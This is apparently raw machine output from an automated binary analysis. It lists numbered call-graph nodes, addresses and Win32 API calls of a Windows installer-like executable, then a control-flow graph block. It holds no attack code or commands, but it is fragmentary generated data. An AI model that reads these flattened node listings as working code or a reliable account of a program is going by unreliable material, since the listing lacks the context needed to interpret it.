4797->4796 4797->4799 4804 405f7d wsprintfW 4798->4804 4801 402c6b SetFilePointer 4799->4801 4799->4803 4801->4803 4802 402d17 ReadFile 4802->4803 4803->4793 4803->4795 4803->4802 4804->4793 4805 402b23 GlobalAlloc 4806 402b39 4805->4806 4807 402b4b 4805->4807 4808 401446 18 API calls 4806->4808 4809 40145c 18 API calls 4807->4809 4811 402b41 4808->4811 4810 402b52 WideCharToMultiByte lstrlenA 4809->4810 4810->4811 4812 402b84 WriteFile 4811->4812 4813 402b93 4811->4813 4812->4813 4814 402384 GlobalFree 4812->4814 4814->4813 4816 4040a3 4817 4040b0 lstrcpynW lstrlenW 4816->4817 4818 4040ad 4816->4818 4818->4817 4819 4054a5 4820 4055f9 4819->4820 4821 4054bd 4819->4821 4823 40564a 4820->4823 4824 40560a GetDlgItem GetDlgItem 4820->4824 4821->4820 4822 4054c9 4821->4822 4826 4054d4 SetWindowPos 4822->4826 4827 4054e7 4822->4827 4825 4056a4 4823->4825 4833 40139d 80 API calls 4823->4833 4828 403d6b 19 API calls 4824->4828 4829 403ddb SendMessageW 4825->4829 4834 4055f4 4825->4834 4826->4827 4830 405504 4827->4830 4831 4054ec ShowWindow 4827->4831 4832 405634 SetClassLongW 4828->4832 4857 4056b6 4829->4857 4835 405526 4830->4835 4836 40550c DestroyWindow 4830->4836 4831->4830 4837 40141d 80 API calls 4832->4837 4840 40567c 4833->4840 4838 40552b SetWindowLongW 4835->4838 4839 40553c 4835->4839 4841 405908 4836->4841 4837->4823 4838->4834 4842 4055b3 4839->4842 4843 405548 GetDlgItem 4839->4843 4840->4825 4844 405680 SendMessageW 4840->4844 4841->4834 4850 405939 ShowWindow 4841->4850 4849 403df6 8 API calls 4842->4849 4847 405578 4843->4847 4848 40555b SendMessageW IsWindowEnabled 4843->4848 4844->4834 4845 40141d 80 API calls 4845->4857 4846 40590a DestroyWindow EndDialog 4846->4841 4852 405585 4847->4852 4855 4055cc SendMessageW 4847->4855 4856 405598 4847->4856 4862 40557d 4847->4862 4848->4834 4848->4847 4849->4834 4850->4834 4851 406831 18 API calls 4851->4857 4852->4855 4852->4862 4853 403d44 SendMessageW 4853->4842 4854 403d6b 19 API calls 4854->4857 4855->4842 4858 4055a0 4856->4858 4859 4055b5 4856->4859 4857->4834 4857->4845 4857->4846 4857->4851 4857->4854 4863 403d6b 19 API calls 4857->4863 4878 40584a DestroyWindow 4857->4878 4861 40141d 80 API calls 4858->4861 4860 40141d 80 API calls 4859->4860 4860->4862 4861->4862 4862->4842 4862->4853 4864 405731 GetDlgItem 4863->4864 4865 405746 4864->4865 4866 40574f ShowWindow EnableWindow 4864->4866 4865->4866 4887 403db1 EnableWindow 4866->4887 4868 405779 EnableWindow 4871 40578d 4868->4871 4869 405792 GetSystemMenu EnableMenuItem SendMessageW 4870 4057c2 SendMessageW 4869->4870 4869->4871 4870->4871 4871->4869 4888 403dc4 SendMessageW 4871->4888 4889 406035 lstrcpynW 4871->4889 4874 4057f0 lstrlenW 4875 406831 18 API calls 4874->4875 4876 405806 SetWindowTextW 4875->4876 4877 40139d 80 API calls 4876->4877 4877->4857 4878->4841 4879 405864 CreateDialogParamW 4878->4879 4879->4841 4880 405897 4879->4880 4881 403d6b 19 API calls 4880->4881 4882 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4881->4882 4883 40139d 80 API calls 4882->4883 4884 4058e8 4883->4884 4884->4834 4885 4058f0 ShowWindow 4884->4885 4886 403ddb SendMessageW 4885->4886 4886->4841 4887->4868 4888->4871 4889->4874 4890 402da5 4891 4030e3 4890->4891 4892 402dac 4890->4892 4893 401446 18 API calls 4892->4893 4894 402db8 4893->4894 4895 402dbf SetFilePointer 4894->4895 4895->4891 4896 402dcf 4895->4896 4896->4891 4898 405f7d wsprintfW 4896->4898 4898->4891 4899 4049a8 GetDlgItem GetDlgItem 4900 4049fe 7 API calls 4899->4900 4905 404c16 4899->4905 4901 404aa2 DeleteObject 4900->4901 4902 404a96 SendMessageW 4900->4902 4903 404aad 4901->4903 4902->4901 4906 404ae4 4903->4906 4909 406831 18 API calls 4903->4909 4904 404cfb 4907 404da0 4904->4907 4908 404c09 4904->4908 4913 404d4a SendMessageW 4904->4913 4905->4904 4917 40487a 5 API calls 4905->4917 4930 404c86 4905->4930 4912 403d6b 19 API calls 4906->4912 4910 404db5 4907->4910 4911 404da9 SendMessageW 4907->4911 4914 403df6 8 API calls 4908->4914 4915 404ac6 SendMessageW SendMessageW 4909->4915 4922 404dc7 ImageList_Destroy 4910->4922 4923 404dce 4910->4923 4928 404dde 4910->4928 4911->4910 4918 404af8 4912->4918 4913->4908 4920 404d5f SendMessageW 4913->4920 4921 404f97 4914->4921 4915->4903 4916 404ced SendMessageW 4916->4904 4917->4930 4924 403d6b 19 API calls 4918->4924 4919 404f48 4919->4908 4929 404f5d ShowWindow GetDlgItem ShowWindow 4919->4929 4925 404d72 4920->4925 4922->4923 4926 404dd7 GlobalFree 4923->4926 4923->4928 4932 404b09 4924->4932 4934 404d83 SendMessageW 4925->4934 4926->4928 4927 404bd6 GetWindowLongW SetWindowLongW 4931 404bf0 4927->4931 4928->4919 4933 40141d 80 API calls 4928->4933 4943 404e10 4928->4943 4929->4908 4930->4904 4930->4916 4935 404bf6 ShowWindow 4931->4935 4936 404c0e 4931->4936 4932->4927 4938 404b65 SendMessageW 4932->4938 4939 404bd0 4932->4939 4941 404b93 SendMessageW 4932->4941 4942 404ba7 SendMessageW 4932->4942 4933->4943 4934->4907 4950 403dc4 SendMessageW 4935->4950 4951 403dc4 SendMessageW 4936->4951 4938->4932 4939->4927 4939->4931 4941->4932 4942->4932 4944 404e54 4943->4944 4947 404e3e SendMessageW 4943->4947 4945 404f1f InvalidateRect 4944->4945 4949 404ecd SendMessageW SendMessageW 4944->4949 4945->4919 4946 404f35 4945->4946 4948 4043d9 21 API calls 4946->4948 4947->4944 4948->4919 4949->4944 4950->4908 4951->4905 4952 4030a9 SendMessageW 4953 4030c2 InvalidateRect 4952->4953 4954 4030e3 4952->4954 4953->4954 3545 4038af #17 SetErrorMode OleInitialize 3619 406328 GetModuleHandleA 3545->3619 3549 40391d GetCommandLineW 3624 406035 lstrcpynW 3549->3624 3551 40392f GetModuleHandleW 3552 403947 3551->3552 3553 405d32 CharNextW 3552->3553 3554 403956 CharNextW 3553->3554 3565 403968 3554->3565 3555 403a02 3556 403a21 GetTempPathW 3555->3556 3625 4037f8 3556->3625 3558 403a37 3560 403a3b GetWindowsDirectoryW lstrcatW 3558->3560 3561 403a5f DeleteFileW 3558->3561 3559 405d32 CharNextW 3559->3565 3563 4037f8 11 API calls 3560->3563 3633 4035b3 GetTickCount GetModuleFileNameW 3561->3633 3566 403a57 3563->3566 3564 403a73 3567 403af8 3564->3567 3569 405d32 CharNextW 3564->3569 3605 403add 3564->3605 3565->3555 3565->3559 3572 403a04 3565->3572 3566->3561 3566->3567 3719 403885 3567->3719 3573 403a8a 3569->3573 3726 406035 lstrcpynW 3572->3726 3584 403b23 lstrcatW lstrcmpiW 3573->3584 3585 403ab5 3573->3585 3575 403bfa 3578 403c7d 3575->3578 3580 406328 3 API calls 3575->3580 3576 403b0d 3579 405ccc MessageBoxIndirectW 3576->3579 3577 406113 9 API calls 3577->3567 3581 403b1b ExitProcess 3579->3581 3583 403c09 3580->3583 3587 406328 3 API calls 3583->3587 3584->3567 3586 403b3f CreateDirectoryW SetCurrentDirectoryW 3584->3586 3727 4067aa 3585->3727 3589 403b62 3586->3589 3590 403b57 3586->3590 3591 403c12 3587->3591 3744 406035 lstrcpynW 3589->3744 3743 406035 lstrcpynW 3590->3743 3595 406328 3 API calls 3591->3595 3598 403c1b 3595->3598 3597 403b70 3745 406035 lstrcpynW 3597->3745 3599 403c69 ExitWindowsEx 3598->3599 3604 403c29 GetCurrentProcess 3598->3604 3599->3578 3603 403c76 3599->3603 3600 403ad2 3742 406035 lstrcpynW 3600->3742 3754 40141d 3603->3754 3608 403c39 3604->3608 3661 405958 3605->3661 3607 406831 18 API calls 3609 403b98 DeleteFileW 3607->3609 3608->3599 3610 403ba5 CopyFileW 3609->3610 3616 403b7f 3609->3616 3610->3616 3611 403bee 3612 406c94 42 API calls 3611->3612 3614 403bf5 3612->3614 3614->3567 3615 406831 18 API calls 3615->3616 3616->3607 3616->3611 3616->3615 3618 403bd9 CloseHandle 3616->3618 3746 406c94 3616->3746 3751 405c6b CreateProcessW 3616->3751 3618->3616 3620 406340 LoadLibraryA 3619->3620 3621 40634b GetProcAddress 3619->3621 3620->3621 3622 4038f2 SHGetFileInfoW 3620->3622 3621->3622 3623 406035 lstrcpynW 3622->3623 3623->3549 3624->3551 3626 406064 5 API calls 3625->3626 3627 403804 3626->3627 3628 40380e 3627->3628 3629 40674e 3 API calls 3627->3629 3628->3558 3630 403816 CreateDirectoryW 3629->3630 3757 405eab 3630->3757 3761 405e7c GetFileAttributesW CreateFileW 3633->3761 3635 4035f3 3655 403603 3635->3655 3762 406035 lstrcpynW 3635->3762 3637 403619 3763 40677d lstrlenW 3637->3763 3641 40362a GetFileSize 3642 403726 3641->3642 3656 403641 3641->3656 3768 4032d2 3642->3768 3644 40372f 3646 40376b GlobalAlloc 3644->3646 3644->3655 3780 403368 SetFilePointer 3644->3780 3645 403336 ReadFile 3645->3656 3779 403368 SetFilePointer 3646->3779 3649 4037e9 3652 4032d2 6 API calls 3649->3652 3650 403786 3653 40337f 33 API calls 3650->3653 3651 40374c 3654 403336 ReadFile 3651->3654 3652->3655 3659 403792 3653->3659 3658 403757 3654->3658 3655->3564 3656->3642 3656->3645 3656->3649 3656->3655 3657 4032d2 6 API calls 3656->3657 3657->3656 3658->3646 3658->3655 3659->3655 3659->3659 3660 4037c0 SetFilePointer 3659->3660 3660->3655 3662 406328 3 API calls 3661->3662 3663 40596c 3662->3663 3664 405972 3663->3664 3665 405984 3663->3665 3794 405f7d wsprintfW 3664->3794 3666 405eff 3 API calls 3665->3666 3667 4059b5 3666->3667 3669 4059d4 lstrcatW 3667->3669 3671 405eff 3 API calls 3667->3671 3670 405982 3669->3670 3785 403ec1 3670->3785 3671->3669 3674 4067aa 18 API calls 3675 405a06 3674->3675 3676 405a9c 3675->3676 3678 405eff 3 API calls 3675->3678 3677 4067aa 18 API calls 3676->3677 3679 405aa2 3677->3679 3680 405a38 3678->3680 3681 405ab2 3679->3681 3682 406831 18 API calls 3679->3682 3680->3676 3684 405a5b lstrlenW 3680->3684 3687 405d32 CharNextW 3680->3687 3683 405ad2 LoadImageW 3681->3683 3796 403ea0 3681->3796 3682->3681 3685 405b92 3683->3685 3686 405afd RegisterClassW 3683->3686 3688 405a69 lstrcmpiW 3684->3688 3689 405a8f 3684->3689 3693 40141d 80 API calls 3685->3693 3691 403aed 3686->3691 3692 405b45 SystemParametersInfoW CreateWindowExW 3686->3692 3694 405a56 3687->3694 3688->3689 3695 405a79 GetFileAttributesW 3688->3695 3697 40674e 3 API calls 3689->3697 3691->3577 3692->3685 3698 405b98 3693->3698 3694->3684 3699 405a85 3695->3699 3696 405ac8 3696->3683 3700 405a95 3697->3700 3698->3691 3701 403ec1 19 API calls 3698->3701 3699->3689 3702 40677d 2 API calls 3699->3702 3795 406035 lstrcpynW 3700->3795 3704 405ba9 3701->3704 3702->3689 3705 405bb5 ShowWindow LoadLibraryW 3704->3705 3706 405c38 3704->3706 3707 405bd4 LoadLibraryW 3705->3707 3708 405bdb GetClassInfoW 3705->3708 3801 405073 OleInitialize 3706->3801 3707->3708 3710 405c05 DialogBoxParamW 3708->3710 3711 405bef GetClassInfoW RegisterClassW 3708->3711 3715 40141d 80 API calls 3710->3715 3711->3710 3712 405c3e 3713 405c42 3712->3713 3714 405c5a 3712->3714 3713->3691 3718 40141d 80 API calls 3713->3718 3716 40141d 80 API calls 3714->3716 3717 405c2d 3715->3717 3716->3691 3717->3691 3718->3691 3720 40389d 3719->3720 3721 40388f CloseHandle 3719->3721 3938 403caf 3720->3938 3721->3720 3726->3556 3991 406035 lstrcpynW 3727->3991 3729 4067bb 3730 405d85 4 API calls 3729->3730 3731 4067c1 3730->3731 3732 406064 5 API calls 3731->3732 3739 403ac3 3731->3739 3735 4067d1 3732->3735 3733 406809 lstrlenW 3734 406810 3733->3734 3733->3735 3737 40674e 3 API calls 3734->3737 3735->3733 3736 406301 2 API calls 3735->3736 3735->3739 3740 40677d 2 API calls 3735->3740 3736->3735 3738 406816 GetFileAttributesW 3737->3738 3738->3739 3739->3567 3741 406035 lstrcpynW 3739->3741 3740->3733 3741->3600 3742->3605 3743->3589 3744->3597 3745->3616 3747 406328 3 API calls 3746->3747 3748 406c9b 3747->3748 3750 406cbc 3748->3750 3992 406ac5 lstrcpyW 3748->3992 3750->3616 3752 405ca6 3751->3752 3753 405c9a CloseHandle 3751->3753 3752->3616 3753->3752 3755 40139d 80 API calls 3754->3755 3756 401432 3755->3756 3756->3578 3758 405eb8 GetTickCount GetTempFileNameW 3757->3758 3759 40382a 3758->3759 3760 405eee 3758->3760 3759->3558 3760->3758 3760->3759 3761->3635 3762->3637 3764 40678c 3763->3764 3765 406792 CharPrevW 3764->3765 3766 40361f 3764->3766 3765->3764 3765->3766 3767 406035 lstrcpynW 3766->3767 3767->3641 3769 4032f3 3768->3769 3770 4032db 3768->3770 3773 403303 GetTickCount 3769->3773 3774 4032fb 3769->3774 3771 4032e4 DestroyWindow 3770->3771 3772 4032eb 3770->3772 3771->3772 3772->3644 3776 403311 CreateDialogParamW ShowWindow 3773->3776 3777 403334 3773->3777 3781 40635e 3774->3781 3776->3777 3777->3644 3779->3650 3780->3651 3782 40637b PeekMessageW 3781->3782 3783 406371 DispatchMessageW 3782->3783 3784 403301 3782->3784 3783->3782 3784->3644 3786 403ed5 3785->3786 3809 405f7d wsprintfW 3786->3809 3788 403f49 3789 406831 18 API calls 3788->3789 3790 403f55 SetWindowTextW 3789->3790 3791 403f70 3790->3791 3792 403f8b 3791->3792 3793 406831 18 API calls 3791->3793 3792->3674 3793->3791 3794->3670 3795->3676 3810 406035 lstrcpynW 3796->3810 3798 403eb4 3799 40674e 3 API calls 3798->3799 3800 403eba lstrcatW 3799->3800 3800->3696 3811 403ddb 3801->3811 3803 403ddb SendMessageW 3804 4050d1 OleUninitialize 3803->3804 3804->3712 3805 4062cf 11 API calls 3806 405096 3805->3806 3806->3805 3808 4050c1 3806->3808 3814 40139d 3806->3814 3808->3803 3809->3788 3810->3798 3812 403df3 3811->3812 3813 403de4 SendMessageW 3811->3813 3812->3806 3813->3812 3817 4013a4 3814->3817 3815 401410 3815->3806 3817->3815 3818 4013dd MulDiv SendMessageW 3817->3818 3819 4015a0 3817->3819 3818->3817 3820 4015fa 3819->3820 3899 40160c 3819->3899 3821 401601 3820->3821 3822 401742 3820->3822 3823 401962 3820->3823 3824 4019ca 3820->3824 3825 40176e 3820->3825 3826 401650 3820->3826 3827 4017b1 3820->3827 3828 401672 3820->3828 3829 401693 3820->3829 3830 401616 3820->3830 3831 4016d6 3820->3831 3832 401736 3820->3832 3833 401897 3820->3833 3834 4018db 3820->3834 3835 40163c 3820->3835 3836 4016bd 3820->3836 3820->3899 3845 4062cf 11 API calls 3821->3845 3837 401751 ShowWindow 3822->3837 3838 401758 3822->3838 3842 40145c 18 API calls 3823->3842 3849 40145c 18 API calls 3824->3849 3839 40145c 18 API calls 3825->3839 3863 4062cf 11 API calls 3826->3863 3843 40145c 18 API calls 3827->3843 3840 40145c 18 API calls 3828->3840 3926 401446 3829->3926 3848 40145c 18 API calls 3830->3848 3862 401446 18 API calls 3831->3862 3831->3899 3832->3899 3937 405f7d wsprintfW 3832->3937 3841 40145c 18 API calls 3833->3841 3846 40145c 18 API calls 3834->3846 3850 401647 PostQuitMessage 3835->3850 3835->3899 3847 4062cf 11 API calls 3836->3847 3837->3838 3851 401765 ShowWindow 3838->3851 3838->3899 3852 401775 3839->3852 3853 401678 3840->3853 3854 40189d 3841->3854 3855 401968 GetFullPathNameW 3842->3855 3856 4017b8 3843->3856 3845->3899 3858 4018e2 3846->3858 3859 4016c7 SetForegroundWindow 3847->3859 3860 40161c 3848->3860 3861 4019d1 SearchPathW 3849->3861 3850->3899 3851->3899 3865 4062cf 11 API calls 3852->3865 3866 4062cf 11 API calls 3853->3866 3867 406301 2 API calls 3854->3867 3868 4019a1 3855->3868 3869 40197f 3855->3869 3870 4062cf 11 API calls 3856->3870 3857 40169a 3871 4062cf 11 API calls 3857->3871 3872 40145c 18 API calls 3858->3872 3859->3899 3873 4062cf 11 API calls 3860->3873 3861->3832 3861->3899 3862->3899 3874 401664 3863->3874 3875 401785 SetFileAttributesW 3865->3875 3876 401683 3866->3876 3877 4018a5 3867->3877 3888 4019b8 GetShortPathNameW 3868->3888 3868->3899 3869->3868 3894 406301 2 API calls 3869->3894 3878 4017c9 3870->3878 3879 4016a7 Sleep 3871->3879 3880 4018eb 3872->3880 3881 401627 3873->3881 3882 40139d 65 API calls 3874->3882 3883 40179a 3875->3883 3875->3899 3892 404f9e 25 API calls 3876->3892 3884 4018c2 3877->3884 3885 4018a9 3877->3885 3929 405d85 CharNextW CharNextW 3878->3929 3879->3899 3889 40145c 18 API calls 3880->3889 3890 404f9e 25 API calls 3881->3890 3882->3899 3891 4062cf 11 API calls 3883->3891 3895 4062cf 11 API calls 3884->3895 3893 4062cf 11 API calls 3885->3893 3888->3899 3897 4018f5 3889->3897 3890->3899 3891->3899 3892->3899 3893->3899 3898 401991 3894->3898 3895->3899 3896 4017d4 3900 401864 3896->3900 3903 405d32 CharNextW 3896->3903 3921 4062cf 11 API calls 3896->3921 3901 4062cf 11 API calls 3897->3901 3898->3868 3936 406035 lstrcpynW 3898->3936 3899->3817 3900->3876 3902 40186e 3900->3902 3904 401902 MoveFileW 3901->3904 3905 404f9e 25 API calls 3902->3905 3907 4017e6 CreateDirectoryW 3903->3907 3908 401912 3904->3908 3909 40191e 3904->3909 3910 401875 3905->3910 3907->3896 3911 4017fe GetLastError 3907->3911 3908->3876 3915 406301 2 API calls 3909->3915 3925 401942 3909->3925 3935 406035 lstrcpynW 3910->3935 3913 401827 GetFileAttributesW 3911->3913 3914 40180b GetLastError 3911->3914 3913->3896 3918 4062cf 11 API calls 3914->3918 3919 401929 3915->3919 3916 401882 SetCurrentDirectoryW 3916->3899 3917 4062cf 11 API calls 3920 40195c 3917->3920 3918->3896 3922 406c94 42 API calls 3919->3922 3919->3925 3920->3899 3921->3896 3923 401936 3922->3923 3924 404f9e 25 API calls 3923->3924 3924->3925 3925->3917 3927 406831 18 API calls 3926->3927 3928 401455 3927->3928 3928->3857 3930 405da2 3929->3930 3933 405db4 3929->3933 3932 405daf CharNextW 3930->3932 3930->3933 3931 405dd8 3931->3896 3932->3931 3933->3931 3934 405d32 CharNextW 3933->3934 3934->3933 3935->3916 3936->3868 3937->3899 3939 403cbd 3938->3939 3940 4038a2 3939->3940 3941 403cc2 FreeLibrary GlobalFree 3939->3941 3942 406cc7 3940->3942 3941->3940 3941->3941 3943 4067aa 18 API calls 3942->3943 3944 406cda 3943->3944 3945 406ce3 DeleteFileW 3944->3945 3946 406cfa 3944->3946 3985 4038ae OleUninitialize 3945->3985 3947 406e77 3946->3947 3989 406035 lstrcpynW 3946->3989 3953 406301 2 API calls 3947->3953 3973 406e84 3947->3973 3947->3985 3949 406d25 3950 406d39 3949->3950 3951 406d2f lstrcatW 3949->3951 3954 40677d 2 API calls 3950->3954 3952 406d3f 3951->3952 3956 406d4f lstrcatW 3952->3956 3958 406d57 lstrlenW FindFirstFileW 3952->3958 3955 406e90 3953->3955 3954->3952 3959 40674e 3 API calls 3955->3959 3955->3985 3956->3958 3957 4062cf 11 API calls 3957->3985 3962 406e67 3958->3962 3986 406d7e 3958->3986 3960 406e9a 3959->3960 3963 4062cf 11 API calls 3960->3963 3961 405d32 CharNextW 3961->3986 3962->3947 3964 406ea5 3963->3964 3965 405e5c 2 API calls 3964->3965 3966 406ead RemoveDirectoryW 3965->3966 3970 406ef0 3966->3970 3971 406eb9 3966->3971 3967 406e44 FindNextFileW 3969 406e5c FindClose 3967->3969 3967->3986 3969->3962 3972 404f9e 25 API calls 3970->3972 3971->3973 3974 406ebf 3971->3974 3972->3985 3973->3957 3976 4062cf 11 API calls 3974->3976 3975 4062cf 11 API calls 3975->3986 3977 406ec9 3976->3977 3980 404f9e 25 API calls 3977->3980 3978 406cc7 72 API calls 3978->3986 3979 405e5c 2 API calls 3981 406dfa DeleteFileW 3979->3981 3982 406ed3 3980->3982 3981->3986 3983 406c94 42 API calls 3982->3983 3983->3985 3984 404f9e 25 API calls 3984->3967 3985->3575 3985->3576 3986->3961 3986->3967 3986->3975 3986->3978 3986->3979 3986->3984 3987 404f9e 25 API calls 3986->3987 3988 406c94 42 API calls 3986->3988 3990 406035 lstrcpynW 3986->3990 3987->3986 3988->3986 3989->3949 3990->3986 3991->3729 3993 406b13 GetShortPathNameW 3992->3993 3994 406aea 3992->3994 3995 406b2c 3993->3995 3996 406c8e 3993->3996 4018 405e7c GetFileAttributesW CreateFileW 3994->4018 3995->3996 3999 406b34 WideCharToMultiByte 3995->3999 3996->3750 3998 406af3 CloseHandle GetShortPathNameW 3998->3996 4000 406b0b 3998->4000 3999->3996 4001 406b51 WideCharToMultiByte 3999->4001 4000->3993 4000->3996 4001->3996 4002 406b69 wsprintfA 4001->4002 4003 406831 18 API calls 4002->4003 4004 406b95 4003->4004 4019 405e7c GetFileAttributesW CreateFileW 4004->4019 4006 406ba2 4006->3996 4007 406baf GetFileSize GlobalAlloc 4006->4007 4008 406bd0 ReadFile 4007->4008 4009 406c84 CloseHandle 4007->4009 4008->4009 4010 406bea 4008->4010 4009->3996 4010->4009 4020 405de2 lstrlenA 4010->4020 4013 406c03 lstrcpyA 4016 406c25 4013->4016 4014 406c17 4015 405de2 4 API calls 4014->4015 4015->4016 4017 406c5c SetFilePointer WriteFile GlobalFree 4016->4017 4017->4009 4018->3998 4019->4006 4021 405e23 lstrlenA 4020->4021 4022 405e2b 4021->4022 4023 405dfc lstrcmpiA 4021->4023 4022->4013 4022->4014 4023->4022 4024 405e1a CharNextA 4023->4024 4024->4021 4955 401cb2 4956 40145c 18 API calls 4955->4956 4957 401c54 4956->4957 4958 4062cf 11 API calls 4957->4958 4959 401c64 4957->4959 4960 401c59 4958->4960 4961 406cc7 81 API calls 4960->4961 4961->4959 3338 4021b5 3354 40145c 3338->3354 3341 40145c 18 API calls 3342 4021c4 3341->3342 3343 40145c 18 API calls 3342->3343 3344 4021cd 3343->3344 3345 40145c 18 API calls 3344->3345 3346 4021d6 3345->3346 3359 404f9e 3346->3359 3349 40221b 3351 4062cf 11 API calls 3349->3351 3350 40220d 3370 4062cf lstrlenW wvsprintfW 3350->3370 3353 402230 3351->3353 3373 406831 3354->3373 3357 401497 3357->3341 3360 404fb7 3359->3360 3361 4021e2 ShellExecuteW 3359->3361 3362 404fd5 lstrlenW 3360->3362 3363 406831 18 API calls 3360->3363 3361->3349 3361->3350 3364 404fe3 lstrlenW 3362->3364 3365 404ffe 3362->3365 3363->3362 3364->3361 3366 404ff5 lstrcatW 3364->3366 3367 405011 3365->3367 3368 405004 SetWindowTextW 3365->3368 3366->3365 3367->3361 3369 405017 SendMessageW SendMessageW SendMessageW 3367->3369 3368->3367 3369->3361 3413 406113 3370->3413 3382 40683e 3373->3382 3374 406aab 3375 401488 3374->3375 3408 406035 lstrcpynW 3374->3408 3375->3357 3392 406064 3375->3392 3377 4068ff GetVersion 3387 40690c 3377->3387 3378 406a72 lstrlenW 3378->3382 3380 406831 10 API calls 3380->3378 3382->3374 3382->3377 3382->3378 3382->3380 3385 406064 5 API calls 3382->3385 3406 405f7d wsprintfW 3382->3406 3407 406035 lstrcpynW 3382->3407 3384 40697e GetSystemDirectoryW 3384->3387 3385->3382 3386 406991 GetWindowsDirectoryW 3386->3387 3387->3382 3387->3384 3387->3386 3388 406831 10 API calls 3387->3388 3389 406a0b lstrcatW 3387->3389 3390 4069c5 SHGetSpecialFolderLocation 3387->3390 3401 405eff RegOpenKeyExW 3387->3401 3388->3387 3389->3382 3390->3387 3391 4069dd SHGetPathFromIDListW CoTaskMemFree 3390->3391 3391->3387 3399 406071 3392->3399 3393 4060e7 3394 4060ed CharPrevW 3393->3394 3396 40610d 3393->3396 3394->3393 3395 4060da CharNextW 3395->3393 3395->3399 3396->3357 3398 4060c6 CharNextW 3398->3399 3399->3393 3399->3395 3399->3398 3400 4060d5 CharNextW 3399->3400 3409 405d32 3399->3409 3400->3395 3402 405f33 RegQueryValueExW 3401->3402 3403 405f78 3401->3403 3404 405f55 RegCloseKey 3402->3404 3403->3387 3404->3403 3406->3382 3407->3382 3408->3375 3410 405d38 3409->3410 3411 405d4e 3410->3411 3412 405d3f CharNextW 3410->3412 3411->3399 3412->3410 3414 40613c 3413->3414 3415 40611f 3413->3415 3416 406130 3414->3416 3418 4061b3 3414->3418 3419 406159 3414->3419 3415->3416 3417 406129 CloseHandle 3415->3417 3416->3349 3417->3416 3418->3416 3421 4061bc lstrcatW lstrlenW WriteFile 3418->3421 3420 406162 GetFileAttributesW 3419->3420 3419->3421 3426 405e7c GetFileAttributesW CreateFileW 3420->3426 3421->3416 3423 40617e 3423->3416 3424 4061a8 SetFilePointer 3423->3424 3425 40618e WriteFile 3423->3425 3424->3418 3425->3424 3426->3423 4962 402238 4963 40145c 18 API calls 4962->4963 4964 40223e 4963->4964 4965 4062cf 11 API calls 4964->4965 4966 40224b 4965->4966 4967 404f9e 25 API calls 4966->4967 4968 402255 4967->4968 4969 405c6b 2 API calls 4968->4969 4970 40225b 4969->4970 4971 4062cf 11 API calls 4970->4971 4979 4022ac CloseHandle 4970->4979 4976 40226d 4971->4976 4973 4030e3 4974 402283 WaitForSingleObject 4975 402291 GetExitCodeProcess 4974->4975 4974->4976 4978 4022a3 4975->4978 4975->4979 4976->4974 4977 40635e 2 API calls 4976->4977 4976->4979 4977->4974 4981 405f7d wsprintfW 4978->4981 4979->4973 4981->4979 3427 401eb9 3428 401f24 3427->3428 3431 401ec6 3427->3431 3429 401f53 GlobalAlloc 3428->3429 3433 401f28 3428->3433 3435 406831 18 API calls 3429->3435 3430 401ed5 3434 4062cf 11 API calls 3430->3434 3431->3430 3437 401ef7 3431->3437 3432 401f36 3451 406035 lstrcpynW 3432->3451 3433->3432 3436 4062cf 11 API calls 3433->3436 3446 401ee2 3434->3446 3439 401f46 3435->3439 3436->3432 3449 406035 lstrcpynW 3437->3449 3441 402708 3439->3441 3442 402387 GlobalFree 3439->3442 3442->3441 3443 401f06 3450 406035 lstrcpynW 3443->3450 3444 406831 18 API calls 3444->3446 3446->3441 3446->3444 3447 401f15 3452 406035 lstrcpynW 3447->3452 3449->3443 3450->3447 3451->3439 3452->3441 4982 404039 4983 404096 4982->4983 4984 404046 lstrcpynA lstrlenA 4982->4984 4984->4983 4985 404077 4984->4985 4985->4983 4986 404083 GlobalFree 4985->4986 4986->4983

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 146 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 153 403947-40394a 146->153 154 40394f-403963 call 405d32 CharNextW 146->154 153->154 157 4039f6-4039fc 154->157 158 403a02 157->158 159 403968-40396e 157->159 160 403a21-403a39 GetTempPathW call 4037f8 158->160 161 403970-403976 159->161 162 403978-40397c 159->162 172 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 160->172 173 403a5f-403a79 DeleteFileW call 4035b3 160->173 161->161 161->162 163 403984-403988 162->163 164 40397e-403983 162->164 166 4039e4-4039f1 call 405d32 163->166 167 40398a-403991 163->167 164->163 166->157 181 4039f3 166->181 170 403993-40399a 167->170 171 4039a6-4039b8 call 40382c 167->171 176 4039a1 170->176 177 40399c-40399f 170->177 186 4039ba-4039c1 171->186 187 4039cd-4039e2 call 40382c 171->187 172->173 184 403af8-403b07 call 403885 OleUninitialize 172->184 173->184 185 403a7b-403a81 173->185 176->171 177->171 177->176 181->157 201 403bfa-403c00 184->201 202 403b0d-403b1d call 405ccc ExitProcess 184->202 188 403ae1-403ae8 call 405958 185->188 189 403a83-403a8c call 405d32 185->189 191 4039c3-4039c6 186->191 192 4039c8 186->192 187->166 198 403a04-403a1c call 40824c call 406035 187->198 200 403aed-403af3 call 406113 188->200 204 403aa5-403aa7 189->204 191->187 191->192 192->187 198->160 200->184 206 403c02-403c1f call 406328 * 3 201->206 207 403c7d-403c85 201->207 211 403aa9-403ab3 204->211 212 403a8e-403aa0 call 40382c 204->212 237 403c21-403c23 206->237 238 403c69-403c74 ExitWindowsEx 206->238 213 403c87 207->213 214 403c8b 207->214 219 403b23-403b3d lstrcatW lstrcmpiW 211->219 220 403ab5-403ac5 call 4067aa 211->220 212->211 227 403aa2 212->227 213->214 219->184 221 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 219->221 220->184 230 403ac7-403add call 406035 * 2 220->230 225 403b62-403b82 call 406035 * 2 221->225 226 403b57-403b5d call 406035 221->226 247 403b87-403ba3 call 406831 DeleteFileW 225->247 226->225 227->204 230->188 237->238 241 403c25-403c27 237->241 238->207 244 403c76-403c78 call 40141d 238->244 241->238 245 403c29-403c3b GetCurrentProcess 241->245 244->207 245->238 252 403c3d-403c5f 245->252 253 403be4-403bec 247->253 254 403ba5-403bb5 CopyFileW 247->254 252->238 253->247 255 403bee-403bf5 call 406c94 253->255 254->253 256 403bb7-403bd7 call 406c94 call 406831 call 405c6b 254->256 255->184 256->253 266 403bd9-403be0 CloseHandle 256->266 266->253
                                              APIs
                                              • #17.COMCTL32 ref: 004038CE
